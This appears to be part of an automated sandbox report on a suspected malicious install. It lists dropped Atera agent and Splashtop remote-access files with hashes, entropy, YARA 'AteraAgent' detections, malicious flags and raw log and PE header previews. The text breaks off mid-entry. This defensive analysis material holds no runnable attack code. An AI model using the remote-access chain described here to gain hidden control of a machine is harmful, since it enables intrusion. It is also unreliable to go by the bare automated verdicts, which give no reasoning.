                                                                                                                                                                                                                                                                                                                                  MD5:4E8A95ACB377D82F36208E74B3D72C59
                                                                                                                                                                                                                                                                                                                                  SHA1:28641167E8AC56B6BD80829532C15216CB227321
                                                                                                                                                                                                                                                                                                                                  SHA-256:DBB6314356B5CF0202C7E97488045F555B109EEDAA18D81E486E9115740A64B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:B02A7E8A3E696BE9CA457B7CD912FBCF3863D097B1136EA7FBC63C3B1A1A9FD39042097B3DD9C361B24DBF4F0B3C2C8D06F36495095D9E52A8AE830ED9F5CA70
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_000_dotnet_runtime_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.2.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.2.D.C.B.8.E.5.3.-.9.D.2.7.-.4.3.F.D.-.A.A.7.8.-.0.2.8.D.5.8.1.F.E.6.E.5.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.5.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.C.:.3.C.). .[.1.8.:.3.1.:.2.7.:.7.0.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.C.:.3.C.). .[.1.8.:.3.1.:.2.7.:.7.0.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.4.C.:.3.C.). .[.1.8.:.3.1.:.2.7.:.7.0.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.C.7.9.F.6.E.E.C.-.3.A.2.B.-.4.8.7.D.-.A.3.B.6.-.E.D.F.4.0.5.7.B.4.E.4.B.}.v.4.8...1.4.0...2.1.4.5.8.\.d.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_001_dotnet_hostfxr_6.0.35_win_x64.msi.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):99102
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7993862805978518
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ne89XoKjDiIeN9ebwkJsjBJNJKyF7D7BZbhcui7khSyV2RjHAXNoKW3w:nySjHAXNoKQw
                                                                                                                                                                                                                                                                                                                                  MD5:3ACB1521F5343BA0FDE24DD75771779D
                                                                                                                                                                                                                                                                                                                                  SHA1:DE9CD250DE1FB2AC8E6A68E070C8930C1AA67E5F
                                                                                                                                                                                                                                                                                                                                  SHA-256:C57C8E28DF888B8D55BDAD806BD200698C9F7E51E61A5365EB5C2B0EF3FD3E48
                                                                                                                                                                                                                                                                                                                                  SHA-512:1894D2697CDF2A4436BD52A1B89AD1B97D132F0F27673EB6909034DAA6E85244AE16790F38E1C616158B2298514CDA04C1646C345D1E4A4812E6A1C8DC13CB3A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_001_dotnet_hostfxr_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_001_dotnet_hostfxr_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_001_dotnet_hostfxr_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.4.3. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.2.D.C.B.8.E.5.3.-.9.D.2.7.-.4.3.F.D.-.A.A.7.8.-.0.2.8.D.5.8.1.F.E.6.E.5.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.5.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.C.:.F.0.). .[.1.8.:.3.1.:.4.3.:.5.6.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.C.:.F.0.). .[.1.8.:.3.1.:.4.3.:.5.6.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.4.C.:.F.0.). .[.1.8.:.3.1.:.4.3.:.5.6.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.E.9.1.F.8.A.C.1.-.4.9.1.7.-.4.5.5.E.-.A.A.C.A.-.B.4.0.B.1.9.3.C.7.A.6.2.}.v.4.8...1.4.0...2.1.4.5.8.\.d.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_002_dotnet_host_6.0.35_win_x64.msi.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (385), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):109420
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7928157640437705
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:32pRXJyrLaQuAdxj42nu3CJgJiLoSqasHoGdfkoY41uRj+6SkElhFGroi1qg:3Bpj+6SkElhFGroiwg
                                                                                                                                                                                                                                                                                                                                  MD5:D7ED3BEBA708A2A694B9C98BE2FE658A
                                                                                                                                                                                                                                                                                                                                  SHA1:1A90A23F70CF8F6FA94F837B47C48C66A5AC0467
                                                                                                                                                                                                                                                                                                                                  SHA-256:74A5494594E0053E2971286A8F9CE4040D515259A1CEB6B97371846E02DF3CEA
                                                                                                                                                                                                                                                                                                                                  SHA-512:811502793DA1876958D92B2747FC39836547B2B2D6EA27E157716D92F99AD098400F4B4D62E1FEF165B827D9D90B74FAEEE1B134FD910F946B435B9FC899DEB7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_002_dotnet_host_6.0.35_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.4.4. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.2.D.C.B.8.E.5.3.-.9.D.2.7.-.4.3.F.D.-.A.A.7.8.-.0.2.8.D.5.8.1.F.E.6.E.5.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.5.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.4.C.:.7.4.). .[.1.8.:.3.1.:.4.4.:.2.0.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.4.C.:.7.4.). .[.1.8.:.3.1.:.4.4.:.2.0.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.4.C.:.7.4.). .[.1.8.:.3.1.:.4.4.:.2.0.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.C.5.9.6.0.1.A.1.-.7.7.1.B.-.4.2.6.B.-.A.9.F.7.-.6.C.A.C.C.A.C.4.D.B.4.E.}.v.4.8...1.4.0...2.1.4.5.8.\.d.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\PreVer.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2988
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.660860648352239
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VyP6PvzyP6Mo70yP6FyP6PapyP6Mo7FxyP6B89xyP6lyP629EyP6+yP6PyP6rLyj:VyPi7yP270yPGyPiMyP27FxyPNyPWyPA
                                                                                                                                                                                                                                                                                                                                  MD5:870F11335FA9B300CDA3A29B280C2115
                                                                                                                                                                                                                                                                                                                                  SHA1:55E59FE7B04AAEF09DE5024E1760A227B5FBD73B
                                                                                                                                                                                                                                                                                                                                  SHA-256:42443E4945FC71A8F19616B6C00CA663066A1B140FB80ECA64F03BA19563DA3B
                                                                                                                                                                                                                                                                                                                                  SHA-512:9DA01AC40A2D2B199F4907F24602FD05619212BC4667B1CFBB00FF7EE994CB5E690621295A95DFFF743BD57ABB9F6E648DE9F988192C4FD22300685D8908DB3F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .S.e.t.K.e.y. .k.e.y.P.a.t.h.:.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r. .f.a.i.l. . .E.r.r.:.0.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .I.n.i.t. .R.e.g.P.a.t.h.:.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r. .h.a.s. .e.r.r.o.r.,. .b.e.c.a.u.s.e. .h.a.v.e. .n.o. .P.r.o.d.u.c.t.c.o.d.e. .o.r. .U.p.g.r.a.d.e. .c.o.d.e. . .E.r.r.:.0.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .N.o. .o.l.d. .v.e.r. .e.x.i.s.t. . .E.r.r.:.1.8.3.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .S.e.t.K.e.y. .k.e.y.P.a.t.h.:.S.p.l.a.s.h.t.o.p. .R.e.m.o.t.e. .S.e.r.v.e.r. .f.o.r. .B.u.s.i.n.e.s.s. .f.a.i.l. . .E.r.r.:.1.8.3.....[.P.R.E.V.E.R.C.H.E.C.K._.E.X.].[.7.4.4.0.:.7.4.4.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.5.1. . .I.n.i.t. .R.e.g.P.a.t.h.:.S.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\PreVer.log.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (523), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1295670
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.855877763525204
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:e8fWA7V69tC7QSjhwptVbvuv5A5HZTutWRz2d4A2G5Yezc8zs1ahsOLuoj/XU3ZJ:9jAVbzjN5
                                                                                                                                                                                                                                                                                                                                  MD5:9D0DC67778EEED5C43531CEF7DB08F01
                                                                                                                                                                                                                                                                                                                                  SHA1:8439DA3B1B63C2DB8C9404A7F615FD003FEEC2A6
                                                                                                                                                                                                                                                                                                                                  SHA-256:ECC130CB1BAC62C1B89231005454A50C3417AE156326CD7B3D1FF07F285B454A
                                                                                                                                                                                                                                                                                                                                  SHA-512:442FC81003C5F7EF3CD53451CB9C6A0ED48CBEB58E0F36113CF1B08758A7755FFC4E1133CFD1F9DEB60D595F0A1B2A7EE08EFCAFB8AE850A605F42FF4595F05A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.0.:.5.1. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .s.e.t.u.p...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.2.4.:.3.4.). .[.1.8.:.3.0.:.5.1.:.6.3.9.].:. .C.l.i.e.n.t.-.s.i.d.e. .a.n.d. .U.I. .i.s. .n.o.n.e. .

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\SplashtopStreamer.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):56378536
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.946478796737553
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:786432:eB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZxE5:jDO0GVUINbD5gwLz2mu2/3YZh3bZS5
                                                                                                                                                                                                                                                                                                                                  MD5:F1356F7FBD37502B529D9BCD643FB7AB
                                                                                                                                                                                                                                                                                                                                  SHA1:35FA2B2BBA3F4E04D078F8B77C5495757144FBDD
                                                                                                                                                                                                                                                                                                                                  SHA-256:C33D039DF86870B7EE728C60B7755E6693596AD6EA9ADD4381F01A42C52877E3
                                                                                                                                                                                                                                                                                                                                  SHA-512:09A50B84F24354DCF35E01E4C7C0081A2C34A7D12957DAF7608A20A5B3EFCEEA63772AEEE4D095A7FD79BFFEC8AB84398048E7BE96CBEA9CC3BA8F2A824316EF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{F~.(F~.(F~.(O.8(U~.(F~.(.|.(O.>(\~.(O.((.~.(O./(.~.(O.!(A~.(O.?(G~.(O.:(G~.(RichF~.(................PE..L......f............................./............@..................................3].............................................. ..(.............\..(..........`................................i..@...................D........................text............................... ..`.rdata..............................@..@.data....^......."..................@....rsrc...(.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4932
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6569249799162855
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:k9O0JOxO2kONdONUk9XA7RNVGmLxNexNa9XAAQxNVDtxNUxNl9XANqxNVgXxNbxz:MmsPU/mUQ
                                                                                                                                                                                                                                                                                                                                  MD5:FEC9F9F527C177305C13EFC89C2D1149
                                                                                                                                                                                                                                                                                                                                  SHA1:9E512C8E546DCAB15B347628EF78FE550B89EDDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:DB42743E0C79D7936C0ED755256E1369E4876ED93DECC22DA86F42874FE1EE0F
                                                                                                                                                                                                                                                                                                                                  SHA-512:1DAF00B19CED04BE56620A6F2BF80E814763FC830F0CFFF155921C81EB4024C0FA3AADCAB9D7CF62A6DAAD97D3F97655A101FFDC4CAFD83B5090ED9A62C91B45
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[.7.3.8.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.4.8. . .[.C.U.t.i.l.i.t.y.:.:.O.S.I.n.f.o.]. .O.S. .1.0...0.(.1.9.0.4.5.). . .x.6.4.:.1. .(.L.a.s.t.=.0.).....[.7.3.8.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.4.8. . .[.C.U.n.P.a.c.k.:.:.F.i.n.d.H.e.a.d.e.r.]. .N.a.m.e.:.C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.S.p.l.a.s.h.t.o.p.S.t.r.e.a.m.e.r...e.x.e. .(.L.a.s.t.=.0.).....[.7.3.8.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.4.8. . .[.C.U.n.P.a.c.k.:.:.F.i.n.d.H.e.a.d.e.r.]. .S.i.g.n. .S.i.z.e.:.1.0.2.4.8. .(.L.a.s.t.=.0.).....[.7.3.8.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.4.8. . .[.C.U.n.P.a.c.k.:.:.F.i.n.d.H.e.a.d.e.r.]. .H.e.a.d.e.r. .o.f.f.s.e.t.:.4.3.4.1.7.6. .(.L.a.s.t.=.1.8.3.).....[.7.3.8.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.4.8. . .[.C.U.n.P.a.c.k.:.:.U.n.P.a.c.k.F.i.l.e.s.]. . .F.r.e.e.S.p.a.c.e.:.1.8.0.9.2.5.4.9.7.3.4.4. .F.i.l.e.S.i.z.e.:.5.3.1.3.6.8.9.6. .(.L.a.s.t.=.0.).....[.7.3.8.4.].2.0.2.4.-.1.0.-.3.0. .1.8.:.3.0.:.4.8. . .[.C.U.n.P.a.c.k.:.:.U.n.P.a.c.k.F.i.l.e.s.]. .(.1./.5.).U.n.P.a.c.k.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\PreVerCheck.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2792968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.591750102911103
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:G2L56VHEj27kAdP/tO11sYF5LGVyfqV/TyDZzsMEQw+uCf+KwBRgb1kHWAo:G2L56VHEjfA9811sYuRhAZADj+uC5bSU
                                                                                                                                                                                                                                                                                                                                  MD5:DF5EB1AF99091A902EFFA52463EDA084
                                                                                                                                                                                                                                                                                                                                  SHA1:B04578B36490A4EC0092E9A44AE6B2679670450A
                                                                                                                                                                                                                                                                                                                                  SHA-256:83EF8E362AF27279B63EF28379675A087984791E5EAF4A9272A5CB4E52DD059C
                                                                                                                                                                                                                                                                                                                                  SHA-512:663E11667EC5C6C7969CE61F90D869F3723CBD007236150478EF6DBD861DDC75CF5F96B0345319BD178CD87045DAA39A0D6CA4AF83CF8DCDB4EBE7462D3EEABD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M.0.,.c.,.c.,.cX^.b.,.cX^.b9,.c.T.c.,.c...b.,.c...b.,.c...b.,.cX^.b.,.cX^.b.,.c.,.c.-.c.b.,.c.`c.,.c.,.c.,.c.b.,.cRich.,.c........................PE..L...P..f...............&.....n'..............0....@...........................*.....~.*...@..........................................P..@)&..........v*..(....*.x'......p........................... ...@............0...............................text...(........................... ..`.rdata..>....0......................@..@.data...4....0......................@....rsrc...@)&..P...*&..$..............@..@.reloc..x'....*..(...N*.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\SRSocketCtrl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):403976
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.913397085225153
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:ABn+r/1zHhY39LgwN7krdItd7YtjIRC67P/4HATggyTG:ABa/1zHeKbri0eC6zRggyTG
                                                                                                                                                                                                                                                                                                                                  MD5:4C534EB38F42BC64F08C33182156D8A1
                                                                                                                                                                                                                                                                                                                                  SHA1:EEBD8F8C323E50945A273F1C197E91A9BE17BBAF
                                                                                                                                                                                                                                                                                                                                  SHA-256:7FA2AA9E466E2F3B884D11984E3D68750CBCDDB033F02F8AAC4AEEF1EE02FAA1
                                                                                                                                                                                                                                                                                                                                  SHA-512:97D5182BB70E21C5C6E2D43AA62FCA5A171AED3D3AC97A623A6FC187590CE3595DDBBF8B82B969BE86EA0FED22C5447819A0F72B1304AEF1560BDFD5F0054E98
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......l...(...(...(...c...%...c......FP..>...c...?....P..)....P..9....P..0....P..f...c...%...(.......FP..n...FP..)...FP..)...(.l.)...FP..)...Rich(...................PE..L....P~f...........!...&............................................................?....@.............................T................................(..l.............................................................$.......................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\libcrypto-3.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1326600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.8708551072063875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:U1RJO1z1sYP0y5EU9dt6VpjccWjqV9JSJkj+KuZzwBMwNG7RHHsi4+uC5:UtO11sYF5LGVyfqV/TyDZzsMEQw+uC5
                                                                                                                                                                                                                                                                                                                                  MD5:72D867E8C7A84374AA72BF7FECA4334E
                                                                                                                                                                                                                                                                                                                                  SHA1:BBE4C42BEB19A1F23BFBCFC5A67164D5EA29784E
                                                                                                                                                                                                                                                                                                                                  SHA-256:17D29B81FAEA714B5A93008711D92D1329B22244A2E9F56736064CAA4FD3CD84
                                                                                                                                                                                                                                                                                                                                  SHA-512:B523DF6FFE4A51180CDF2BDA761B01A521391A6B24E081309C33C91835C19BE96015B932D527822F5837802A979A3C48F5CC111892C47C082E8BCB8F2115AC3F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...8P..8P..8P..;Q..8P..=Q..8P..<Q..8P.S=Q..8P.S<Q..8P.S;Q..8P..9P!.8P..9Q..8P..8P..8P.S<QV.8P.S8Q..8P.S.P..8P.S:Q..8PRich..8P................PE..L...%..e...........!...&.....0....(...:.. (...:..............................@<......v....@...........................:..!....:.@.....:..................(...6<.....................................t.:.............................................UPX0......(.............................UPX1......... (.....................@....rsrc....0....:..(..................@..............................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\unpack\libssl-3.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):341512
